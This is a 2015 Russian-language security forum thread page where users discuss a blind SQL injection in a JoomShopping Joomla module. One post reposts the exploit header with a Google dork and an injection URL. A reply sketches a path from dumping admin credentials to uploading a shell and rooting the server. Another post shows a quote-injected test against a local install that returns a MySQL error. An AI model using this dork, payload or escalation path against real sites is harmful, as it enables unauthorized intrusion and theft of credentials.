HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 89 из 296 « Первая < 3979 85 86 87 88 89 90 91 92 93 99139189 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #881  
Старый 30.11.2015, 16:19
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
[SIZE="4"][B]Вопрос по vBulletin 4.0.x
 
Ответить с цитированием

  #882  
Старый 30.11.2015, 17:27
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию
Цитата:
Сообщение от Sensoft  
Sensoft said:

Когда отсылаю POST запрос страница не перезагружается, почему ?
Вероятно у вас firefox версией выше 30, live http headers с версиями выше 30 не работает
 
Ответить с цитированием

  #883  
Старый 30.11.2015, 17:44
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
Цитата:
Сообщение от Br@!ns  
Br@!ns said:

Вероятно у вас firefox версией выше 30, live http headers с версиями выше 30 не работает
Спасибо чувак помог
 
Ответить с цитированием

  #884  
Старый 02.12.2015, 15:05
ButilkaSoka
Guest
Сообщений: n/a
Провел на форуме:
7285

Репутация: 0
По умолчанию
[QUOTE="Sensoft"]
Sensoft said:

[SIZE="4"][B]Вопрос по vBulletin 4.0.x
 
Ответить с цитированием

  #885  
Старый 04.12.2015, 17:40
xaj3uie
Guest
Сообщений: n/a
Провел на форуме:
1817

Репутация: 0
По умолчанию
JoomShopping - Blind SQL Injection

# Exploit Title: [JoomShopping Blind Sql injection]

# Google Dork: [allinurl:"/modules/mod_jshopping_products_wfl/js/"]

# Date: [2015-07-24]

# Exploit Author: [Mormoroth]

# Vendor Homepage: [http://www.webdesigner-profi.de]

# Software Link: [http://www.webdesigner-profi.de/joom...ownloads.html]

# Version: [All]

# Tested on: [Linux]

----------------------------

site/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a

Кто-нибудь пробовал применять? Можно что-то из этого извлечь?
 
Ответить с цитированием

  #886  
Старый 04.12.2015, 21:42
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
Цитата:
Сообщение от xaj3uie  
xaj3uie said:

Кто-нибудь пробовал применять? Можно что-то из этого извлечь?
Из этого можно извлечь логин:пасс админский, разхешить, зайти в админку и залиться, порутать сервак, а потом извлекать пользу....
 
Ответить с цитированием

  #887  
Старый 04.12.2015, 21:57
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
Цитата:
Сообщение от winstrool  
winstrool said:

Из этого можно извлечь логин:пасс админский, разхешить, зайти в админку и залиться, порутать сервак, а потом извлекать пользу....
# Software Link: [http://www.webdesigner-profi.de/joom...ownloads.html]

Где взять а то не робит ссылка
 
Ответить с цитированием

  #888  
Старый 04.12.2015, 23:38
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Цитата:
Сообщение от Sensoft  
Sensoft said:

# Software Link: [http://www.webdesigner-profi.de/joom...ownloads.html]
Где взять а то не робит ссылка
у вас там уже все есть. или вам плагин нужен?
 
Ответить с цитированием

  #889  
Старый 04.12.2015, 23:39
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
Цитата:
Сообщение от yarbabin  
yarbabin said:

у вас там уже все есть. или вам плагин нужен?
Плагин
 
Ответить с цитированием

  #890  
Старый 05.12.2015, 12:52
xaj3uie
Guest
Сообщений: n/a
Провел на форуме:
1817

Репутация: 0
По умолчанию
Цитата:
Сообщение от winstrool  
winstrool said:

Из этого можно извлечь логин:пасс админский, разхешить, зайти в админку и залиться, порутать сервак, а потом извлекать пользу....
Либо я не до конца понимаю, либо у меня версии не сходятся.

Установил на локалку 3.4 версию движка и скачал с официального сайта этот джумлашопинг.

Вставляю так:

test.ru/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a

.SpoilerTarget" type="button">Spoiler: Открыть
Получаю сообщение:

if(typeof(jQuery) != 'undefined') {jQuery.noConflict();}window.addEvent('load',funct ion(){wflSliders['wfls209 and 1=2-- a'] = new wflSlider({"ribbon_behavior":null,"duration":500," effect_block":"single","id":"209 and 1=2-- a","orientation":"hor"})});
Вставляю вот так:

.SpoilerTarget" type="button">Spoiler: Ещё посмотреть
test.ru/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a'

Получаю:

Error displaying the error page: Application Instantiation Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''209 and 1=2-- a''' at line 3 SQL=SELECT params FROM bigmb_modules WHERE id='209 and 1=2-- a''


Получается, уязвимость присутствует и нужно лишь правильно составить запрос?

Направьте в нужное русло пожалуйста.
 
Ответить с цитированием
Ответ
Страница 89 из 296 « Первая < 3979 85 86 87 88 89 90 91 92 93 99139189 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ